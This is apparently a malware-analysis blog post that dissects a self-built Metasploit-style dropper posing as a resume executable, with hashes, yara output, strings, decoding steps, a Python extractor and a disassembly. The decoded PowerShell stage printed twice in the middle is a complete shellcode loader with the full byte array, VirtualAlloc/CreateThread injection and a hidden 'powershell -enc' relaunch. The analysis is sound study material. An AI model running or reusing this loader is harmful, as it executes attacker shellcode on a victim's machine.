4.16.2018

Party on the malware bus

I've been playing with some ideas recently, and it's actually kind of amusing what responses I can get and which sources I can identify from them. Let's start with one thing I generated with TheFatRat (basically a wrapper for building Metasploit-compatible shells). Testing the generation schemes, I decided I would build some ways of doing this, such as adding base64 of exec to one page and a unicorn PowerShell script to another and using all that. Anyway, let's look:

5-minute easy-mode analysis:
; Hashes unknown
rahash2 -a all ./resume1.doc.exe
./resume1.doc.exe: 0x00000000-0x000041ff md5: 90f7ee1bf4451349dfa7c518a8c6202a
./resume1.doc.exe: 0x00000000-0x000041ff sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82
./resume1.doc.exe: 0x00000000-0x000041ff sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6
./resume1.doc.exe: 0x00000000-0x000041ff sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad
./resume1.doc.exe: 0x00000000-0x000041ff sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691
./resume1.doc.exe: 0x00000000-0x000041ff crc16: 9f78
./resume1.doc.exe: 0x00000000-0x000041ff crc32: 1b63e4bd
./resume1.doc.exe: 0x00000000-0x000041ff md4: 282dcd274bd2efade3765ddff3ec65e1
./resume1.doc.exe: 0x00000000-0x000041ff xor: eb
./resume1.doc.exe: 0x00000000-0x000041ff xorpair: 3ad1
./resume1.doc.exe: 0x00000000-0x000041ff parity: 00
./resume1.doc.exe: 0x00000000-0x000041ff entropy: 03000000
./resume1.doc.exe: 0x00000000-0x000041ff hamdist: 01
./resume1.doc.exe: 0x00000000-0x000041ff pcprint: 2d
./resume1.doc.exe: 0x00000000-0x000041ff mod255: 4d
./resume1.doc.exe: 0x00000000-0x000041ff xxhash: 5924b386
./resume1.doc.exe: 0x00000000-0x000041ff adler32: 913ba49c
./resume1.doc.exe: 0x00000000-0x000041ff luhn: 00
./resume1.doc.exe: 0x00000000-0x000041ff crc8smbus: 3f
./resume1.doc.exe: 0x00000000-0x000041ff crc15can: 5a1d
./resume1.doc.exe: 0x00000000-0x000041ff crc16hdlc: 4045
./resume1.doc.exe: 0x00000000-0x000041ff crc16usb: a732
./resume1.doc.exe: 0x00000000-0x000041ff crc16citt: 4b6a
./resume1.doc.exe: 0x00000000-0x000041ff crc24: 7a1917
./resume1.doc.exe: 0x00000000-0x000041ff crc32c: d18b15a4
./resume1.doc.exe: 0x00000000-0x000041ff crc32ecma267: df97a7b0

; yara matches (mostly PEiD-style compiler signatures, repeated because the rule files overlap; the hits that matter are IsNET_EXE / .NET executable and contentis_base64. The packer hits such as yoda's Protector, UPolyX and dUP don't fit a plain csc-built .NET exe and read as loose-signature noise)
find /yararules/ -type f -name "*.yar" -exec yara -r {} ./resume1.doc.exe \; 2>/dev/null
without_urls ./resume1.doc.exe
_NET_executable__Microsoft_ ./resume1.doc.exe
_yodas_Protector_v1033_dllocx__Ashkbiz_Danehkar_h_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe
_First_Publisher_Graphics_format_ ./resume1.doc.exe
_UPolyX_v05_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
_NET_executable__Microsoft_ ./resume1.doc.exe
_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe
_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
NETexecutableMicrosoft ./resume1.doc.exe
IsPE32 ./resume1.doc.exe
IsNET_EXE ./resume1.doc.exe
IsConsole ./resume1.doc.exe
Microsoft_Visual_Studio_NET ./resume1.doc.exe
Microsoft_Visual_C_v70_Basic_NET_additional ./resume1.doc.exe
Microsoft_Visual_C_Basic_NET ./resume1.doc.exe
Microsoft_Visual_Studio_NET_additional ./resume1.doc.exe
Microsoft_Visual_C_v70_Basic_NET ./resume1.doc.exe
NET_executable_ ./resume1.doc.exe
NET_executable ./resume1.doc.exe
domain ./resume1.doc.exe
without_attachments ./resume1.doc.exe
without_urls ./resume1.doc.exe
without_images ./resume1.doc.exe
_Microsoft_Visual_Cpp_v70_DLL_ ./resume1.doc.exe
without_images ./resume1.doc.exe
IP ./resume1.doc.exe
without_attachments ./resume1.doc.exe
contentis_base64 ./resume1.doc.exe

; strings
rabin2 -zz resume1.doc.exe
Metadata Signature: 0x268 0x10001424a5342 12
.NET Version: v4.0.30319
Number of Metadata Streams: 5
DirectoryAddress: 6c Size: f0
Stream name: #~ 4
DirectoryAddress: 15c Size: b8
Stream name: #Strings 12
DirectoryAddress: 214 Size: 3688
Stream name: #US 4
DirectoryAddress: 389c Size: 10
Stream name: #GUID 8
DirectoryAddress: 38ac Size: 38
Stream name: #Blob 8
vaddr=0x0000004d paddr=0x0000004d ordinal=000 sz=45 len=44 section=unknown type=ascii string=!This program cannot be run in DOS mode.\r\r\n$
vaddr=0x000000a9 paddr=0x000000a9 ordinal=001 sz=24 len=5 section=unknown type=utf32le string=Y `䀀  blocks=Basic Latin,CJK Unified Ideographs Extension A
vaddr=0x00000178 paddr=0x00000178 ordinal=002 sz=6 len=5 section=unknown type=ascii string=.text
vaddr=0x0000019f paddr=0x0000019f ordinal=003 sz=7 len=6 section=unknown type=ascii string=`.rsrc
vaddr=0x000001c7 paddr=0x000001c7 ordinal=004 sz=8 len=7 section=unknown type=ascii string=@.reloc
vaddr=0x00402056 paddr=0x00000256 ordinal=005 sz=5 len=4 section=.text type=ascii string=\n*2r
vaddr=0x00402068 paddr=0x00000268 ordinal=006 sz=5 len=4 section=.text type=ascii string=BSJB
vaddr=0x00402078 paddr=0x00000278 ordinal=007 sz=11 len=10 section=.text type=ascii string=v4.0.30319
vaddr=0x00402088 paddr=0x00000288 ordinal=008 sz=24 len=5 section=.text type=utf32le string=lð縣Ŝ¸ blocks=Basic Latin,Latin-1 Supplement,CJK Unified Ideographs,Latin Extended-A
vaddr=0x004020a0 paddr=0x000002a0 ordinal=009 sz=5 len=4 section=.text type=ascii string=ings
vaddr=0x004020bc paddr=0x000002bc ordinal=010 sz=6 len=5 section=.text type=ascii string=#GUID
vaddr=0x004020cc paddr=0x000002cc ordinal=011 sz=6 len=5 section=.text type=ascii string=#Blob
vaddr=0x004021c5 paddr=0x000003c5 ordinal=012 sz=9 len=8 section=.text type=ascii string=<Module>
vaddr=0x004021ce paddr=0x000003ce ordinal=013 sz=7 len=6 section=.text type=ascii string=pshcmd
vaddr=0x004021d9 paddr=0x000003d9 ordinal=014 sz=7 len=6 section=.text type=ascii string=system
vaddr=0x004021e0 paddr=0x000003e0 ordinal=015 sz=11 len=10 section=.text type=ascii string=msvcrt.dll
vaddr=0x004021ef paddr=0x000003ef ordinal=016 sz=7 len=6 section=.text type=ascii string=Object
vaddr=0x004021f6 paddr=0x000003f6 ordinal=017 sz=7 len=6 section=.text type=ascii string=System
vaddr=0x004021fd paddr=0x000003fd ordinal=018 sz=6 len=5 section=.text type=ascii string=.ctor
vaddr=0x00402203 paddr=0x00000403 ordinal=019 sz=5 len=4 section=.text type=ascii string=Main
vaddr=0x00402208 paddr=0x00000408 ordinal=020 sz=20 len=19 section=.text type=ascii string=csharpandpowershell
vaddr=0x0040221c paddr=0x0000041c ordinal=021 sz=30 len=29 section=.text type=ascii string=RuntimeCompatibilityAttribute
vaddr=0x0040223a paddr=0x0000043a ordinal=022 sz=32 len=31 section=.text type=ascii string=System.Runtime.CompilerServices
vaddr=0x0040225a paddr=0x0000045a ordinal=023 sz=9 len=8 section=.text type=ascii string=mscorlib
vaddr=0x00402263 paddr=0x00000463 ordinal=024 sz=24 len=23 section=.text type=ascii string=csharpandpowershell.exe
vaddr=0x0040227f paddr=0x0000047f ordinal=025 sz=4090 len=2045 section=.text type=utf16le string=powershell -window hidden -EncodedCommand JAB...AB
vaddr=0x00403279 paddr=0x00001479 ordinal=026 sz=4090 len=2045 section=.text type=utf16le string=4A...MA
vaddr=0x00404273 paddr=0x00002473 ordinal=027 sz=4090 len=2045 section=.text type=utf16le string=Yw...B9A
vaddr=0x0040526d paddr=0x0000346d ordinal=028 sz=1698 len=848 section=.text type=utf16le string=Ds...==였꽆쑜镨멁 blocks=Basic Latin,Hangul Syllables,CJK Unified Ideographs
vaddr=0x0040590f paddr=0x00003b0f ordinal=029 sz=6 len=5 section=.text type=ascii string=n'W]7
vaddr=0x0040592a paddr=0x00003b2a ordinal=030 sz=23 len=22 section=.text type=ascii string=WrapNonExceptionThrows
vaddr=0x00405982 paddr=0x00003b82 ordinal=031 sz=12 len=11 section=.text type=ascii string=_CorExeMain
vaddr=0x0040598e paddr=0x00003b8e ordinal=032 sz=12 len=11 section=.text type=ascii string=mscoree.dll
vaddr=0x00406062 paddr=0x00003c62 ordinal=033 sz=28 len=13 section=.rsrc type=utf16le string=_VERSION_INFO
vaddr=0x004060bc paddr=0x00003cbc ordinal=034 sz=22 len=10 section=.rsrc type=utf16le string=arFileInfo
vaddr=0x004060da paddr=0x00003cda ordinal=035 sz=24 len=11 section=.rsrc type=utf16le string=Translation
vaddr=0x004060fe paddr=0x00003cfe ordinal=036 sz=30 len=14 section=.rsrc type=utf16le string=StringFileInfo
vaddr=0x00406122 paddr=0x00003d22 ordinal=037 sz=18 len=8 section=.rsrc type=utf16le string=007f04b0
vaddr=0x0040613a paddr=0x00003d3a ordinal=038 sz=18 len=8 section=.rsrc type=utf16le string=Comments
vaddr=0x00406158 paddr=0x00003d58 ordinal=039 sz=22 len=10 section=.rsrc type=utf16le string=ompanyName
vaddr=0x0040617c paddr=0x00003d7c ordinal=040 sz=30 len=14 section=.rsrc type=utf16le string=ileDescription
vaddr=0x004061a6 paddr=0x00003da6 ordinal=041 sz=24 len=11 section=.rsrc type=utf16le string=FileVersion
vaddr=0x004061c0 paddr=0x00003dc0 ordinal=042 sz=16 len=7 section=.rsrc type=utf16le string=0.0.0.0
vaddr=0x004061d6 paddr=0x00003dd6 ordinal=043 sz=26 len=12 section=.rsrc type=utf16le string=InternalName
vaddr=0x004061f0 paddr=0x00003df0 ordinal=044 sz=40 len=19 section=.rsrc type=utf16le string=csharpandpowershell
vaddr=0x0040621e paddr=0x00003e1e ordinal=045 sz=30 len=14 section=.rsrc type=utf16le string=LegalCopyright
vaddr=0x00406248 paddr=0x00003e48 ordinal=046 sz=30 len=14 section=.rsrc type=utf16le string=egalTrademarks
vaddr=0x00406272 paddr=0x00003e72 ordinal=047 sz=34 len=16 section=.rsrc type=utf16le string=OriginalFilename
vaddr=0x00406294 paddr=0x00003e94 ordinal=048 sz=48 len=23 section=.rsrc type=utf16le string=csharpandpowershell.exe
vaddr=0x004062ca paddr=0x00003eca ordinal=049 sz=24 len=11 section=.rsrc type=utf16le string=ProductName
vaddr=0x004062f0 paddr=0x00003ef0 ordinal=050 sz=28 len=13 section=.rsrc type=utf16le string=roductVersion

; note
payload appears to be a PowerShell -EncodedCommand payload, i.e. base64 over the UTF-16LE script text ("JAB..." is how a script beginning with "$" and a letter looks once UTF-16LE-encoded and base64'd)

; not valid length by itself (rabin2 -zz chops long strings into 2045-character pieces, ordinals 025-028 above, so no single piece decodes)
JAB...AMAB

; collecting base64 strings together (ordinals 025-028 concatenated in order, up to the trailing "==")
JAB...==

; writing decoded base64 to file (base64 module; str.decode('base64') only exists on Python 2)
import base64; open('resumebase64.decoded','wb').write(base64.b64decode("""JAB...=="""))

; strings from decoded base64
rabin2 -zz resumebase64.decoded
vaddr=0x00000000 paddr=0x00000000 ordinal=000 sz=4090 len=2045 section=unknown type=utf16le string=$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0
x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,
vaddr=0x00000ffa paddr=0x00000ffa ordinal=001 sz=1110 len=555 section=unknown type=utf16le string=0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; Investigating powershell
$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,
0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; saving hex as binary file (bytes.fromhex instead of the Python 2-only str.decode('hex'))
open('resumehex.bin','wb').write(bytes.fromhex("0xd9,...0xac".replace(',','').replace('0x','').replace(' ','')))
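The same extraction done in one pass, as an added example rather than code from the post: instead of gluing the 2045-character rabin2 pieces back together by hand, scan the raw PE bytes for the UTF-16LE "-EncodedCommand " marker (the .NET #US heap stores the string that way), take the whole base64 run, decode it to the script and lift the [Byte[]] literal. The dropper bytes it runs on are constructed here, a stub with the same command-string layout as resume1.doc.exe, not the real sample, and the helper names are mine.

```python
"""Lift the -EncodedCommand payload out of a C#-wrapped PowerShell dropper.

Added example, not code from the post. The PE bytes used below are constructed
to mimic the command string in resume1.doc.exe; nothing here is the real file.
"""
import base64
import re


def _u16(s: str) -> bytes:
    """Regex-escaped UTF-16LE form of an ASCII marker."""
    return re.escape(s.encode("utf-16-le"))


# Marker variants PowerShell accepts, followed by a base64 run in UTF-16LE
# (each alphabet char is followed by a NUL byte). Case-insensitive on the marker.
MARKER_RE = re.compile(
    rb"(?:" + _u16("-EncodedCommand ") + rb"|" + _u16("-enc ") + rb"|" + _u16("-e ") + rb")"
    + rb"((?:[A-Za-z0-9+/=]\x00)+)",
    re.IGNORECASE,
)
# [Byte[]]$z = 0xd9,0xe9,...   the literal that carries the shellcode
BYTE_ARRAY = re.compile(r"\[Byte\[\]\]\s*\$\w+\s*=\s*((?:0x[0-9a-fA-F]{1,2}\s*,?\s*)+)")


def extract_encoded_command(blob: bytes) -> str:
    """Return the base64 text that follows the first encoded-command marker."""
    m = MARKER_RE.search(blob)
    if not m:
        raise ValueError("no -EncodedCommand/-enc/-e marker followed by base64")
    return m.group(1).decode("utf-16-le")


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over the UTF-16LE script, so decode twice."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def extract_byte_array(script: str) -> bytes:
    """Parse the [Byte[]]$name = 0x..,0x.. literal into raw bytes."""
    m = BYTE_ARRAY.search(script)
    if not m:
        raise ValueError("no [Byte[]] literal in script")
    return bytes(int(h, 16) for h in re.findall(r"0x([0-9a-fA-F]{1,2})", m.group(1)))


def shellcode_from_dropper(blob: bytes) -> bytes:
    """Dropper bytes -> base64 -> PowerShell source -> shellcode bytes."""
    return extract_byte_array(decode_encoded_command(extract_encoded_command(blob)))


# --- constructed sample standing in for resume1.doc.exe -----------------------
# Same shape as the recovered script (P/Invoke string, [Byte[]]$z, VirtualAlloc);
# the byte array is only the first 12 bytes of the real one.
SAMPLE_SCRIPT = (
    "$E2yZ = '$BVJ = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc("
    "IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);'';"
    "$w = Add-Type -memberDefinition $BVJ -Name \"Win32\" -namespace Win32Functions -passthru;"
    "[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e;"
    "$g = 0x1000;$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);'"
)


def build_sample_dropper(script: str = SAMPLE_SCRIPT) -> bytes:
    """Constructed PE-ish blob: a fake header, then the command string as UTF-16LE."""
    cmd = "powershell -window hidden -EncodedCommand " + base64.b64encode(
        script.encode("utf-16-le")).decode("ascii")
    return b"MZ\x90\x00" + bytes(60) + cmd.encode("utf-16-le") + bytes(16)


if __name__ == "__main__":
    sc = shellcode_from_dropper(build_sample_dropper())
    print(len(sc), "bytes:", sc.hex())
```

On the real file, pass `open("resume1.doc.exe", "rb").read()` to `shellcode_from_dropper`; because the whole base64 run is taken from the binary, the rabin2 chunk boundaries never come into play.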

; radare from bin (opened with the default 64-bit arch, so this first listing is wrong: rsp/rsi operands, 0x43/0x49 swallowed as REX prefixes and shown as 'invalid'; the 32-bit listing below is the one to read)
[0x00000000]> pD
            0x00000000      d9e9           fldl2t
            0x00000002      ba34683436     mov edx, 0x36346834
       :    0x00000007      d97424f4       fnstenv dword [rsp - 0xc]
       :    0x0000000b      5e             pop rsi
       :    0x0000000c      33c9           xor ecx, ecx
       :    0x0000000e      b147           mov cl, 0x47                ; 'G'
       :    0x00000010      315618         xor dword [rsi + 0x18], edx
       :    0x00000013      83c604         add esi, 4
       :    0x00000016      035620         add edx, dword [rsi + 0x20]
       :    0x00000019      8ac1           mov al, cl
       :    0x0000001b      caa0c8         retf -0x3760
       :    0x0000001e      2a33           sub dh, byte [rbx]
       :    0x00000020      30ada3d601ed   xor byte [rbp - 0x12fe295d], ch
       :    0x00000026      d09331dd93f6   rcl byte [rbx - 0x96c22cf], 1
       :    0x0000002c      bd96f6e236     mov ebp, 0x36e2f696
       :    0x00000031      dade           fcmovu st(0), st(6)
       :    0x00000033      05ff51392b     add eax, 0x2b3951ff
       :    0x00000038      00c9           add cl, cl
      ,===< 0x0000003a      792a           jns 0x66
      |:    0x0000003c      82             invalid
      |:    0x0000003d      10ae8cbbdaa3   adc byte [rsi - 0x5c254474], ch
      |:    0x00000043      cdfc           int 0xfc
      |:    0x00000045      07             invalid
      |:    0x00000046      499f           lahf
      |:    0x00000048      55             push rbp
      |:    0x00000049      43fc           cld
      |:    0x0000004b      30d2           xor dl, dl
      |:    0x0000004d      193dbaa88c45   sbb dword [0x458ca90d], edi
      |:    0x00000053      5f             pop rdi
      |`==< 0x00000054      78ae           js 4
      |.--> 0x00000056      64             invalid
      |:    0x00000057      ce             invalid
      |:,=< 0x00000058      f3e9a6f0d081   jmp 0xffffffff81d0f104
      |:|   0x0000005e      ee             out dx, al
      |:|   0x0000005f      ea             invalid
      |:|   0x00000060      35afb9818d     xor eax, 0x8d81b9af
      |:|   0x00000065      5b             pop rbx
      `---> 0x00000066      3840dc         cmp byte [rax - 0x24], al   ; [0x2:1]=186
       :|   0x00000069      a4             movsb byte [rdi], byte ptr [rsi]
       :|   0x0000006a      97             xchg eax, edi
       :|   0x0000006b      ad             lodsd eax, dword [rsi]
       :|   0x0000006c      d156e9         rcl dword [rsi - 0x17], 1
       :|   0x0000006f      ea             invalid
       :|   0x00000070      d5             invalid
       :|   0x00000071      889c022634a7.  mov byte [rdx + rax - 0x2f58cbda], bl
       :|   0x00000078      55             push rbp
       :,=< 0x00000079      e222           loop 0x9d
      :||   0x0000007b      c3             ret
      :||   0x0000007c      fd             std
      :||   0x0000007d      61             invalid
      :||   0x0000007e      94             xchg eax, esp
      :||   0x0000007f      2f             invalid
      :||   0x00000080      fc             cld
      :||   0x00000081      a6             cmpsb byte [rsi], byte ptr [rdi] ; [0x2700000000:1]=255 ; 167503724544
      :||   0x00000082      43bbf20307e3   mov r11d, 0xe30703f2
      :||   0x00000088      16             invalid                     ; 0xe30703f2
      :||   0x00000089      95             xchg eax, ebp
      :||   0x0000008a      c4             invalid
      :||   0x0000008b      9f             lahf
      :||   0x0000008c      221e           and bl, byte [rsi]
      ,===< 0x0000008e      eb4f           jmp 0xdf
     |:||   0x00000090      a364c84be83f.  movabs dword [0x54cd713fe84bc864], eax ; [0x54cd713fe84bc864:4]=-1
     |:||   0x00000099      91             xchg eax, ecx
     |:||   0x0000009a      8e0d374e2b45   mov cs, word [0x452b4ed7]   ; [0x452b4ed7:2]=0xffff
      |:|   0x000000a0      d5             invalid                     ; [0x452b4ed7:2]=0xffff
      |:|   0x000000a1      9b             wait
      |:|   0x000000a2      4604b1         add al, 0xb1
      |:|   0x000000a5      686bb741e7     push -0x18be4895
      |:|   0x000000aa      fc             cld
      |:|   0x000000ab      c4             invalid
      |`==< 0x000000ac      73a8           jae 0x56
      | |   0x000000ae      56             push rsi
      | |   0x000000af      43             invalid
      | .-> 0x000000b0      3f             invalid
     | :|   0x000000b1      217194         and dword [rcx - 0x6c], esi
     | :|   0x000000b4      4018c5         sbb bpl, al
     | :|   0x000000b7      0abfa336027b   or bh, byte [rdi + 0x7b0236a3]
     | :|   0x000000bd      f7663c         mul dword [rsi + 0x3c]
     | :|   0x000000c0      aa             stosb byte [rdi], al
      | `=< 0x000000c1      78ed           js 0xb0
      | |   0x000000c3      bc53ad98b6     mov esp, 0xb698ad53
      | |   0x000000c8      c3             ret
      | |   0x000000c9      96             xchg eax, esi
      | |   0x000000ca      6a77           push 0x77                   ; 'w'
      | ,=< 0x000000cc      714f           jno 0x11d
     | ||   0x000000ce      97             xchg eax, edi
      |,==< 0x000000cf      7756           ja 0x127
     ||||   0x000000d1      bf1e91c8ef     mov edi, 0xefc8911e
     ,====< 0x000000d6      700e           jo 0xe6
    |||||   0x000000d8      a85f           test al, 0x5f               ; '_'
    |||||   0x000000da      31fe           xor esi, edi
    |||||   0x000000dc      408abe2170b5.  mov dil, byte [rsi + 0x14b57021] ; [0x14b57021:1]=255
    | |||   0x000000e3      4a1a5ac1       sbb bl, byte [rdx - 0x3f]
      |||   0x000000e7      22b2c348b823   and dh, byte [rdx + 0x23b848c3]
      |||   0x000000ed      0b47c4         or eax, dword [rdi - 0x3c]
      |||   0x000000f0      63             invalid
      |||   0x000000f1      8764382d       xchg dword [rax + rdi + 0x2d], esp
      |||   0x000000f5      60             invalid
      |||   0x000000f6      002a           add byte [rdx], ch
      |||   0x000000f8      d9805f104f9e   fld dword [rax - 0x61b0efa1]
      ,===< 0x000000fe      753f           jne 0x13f

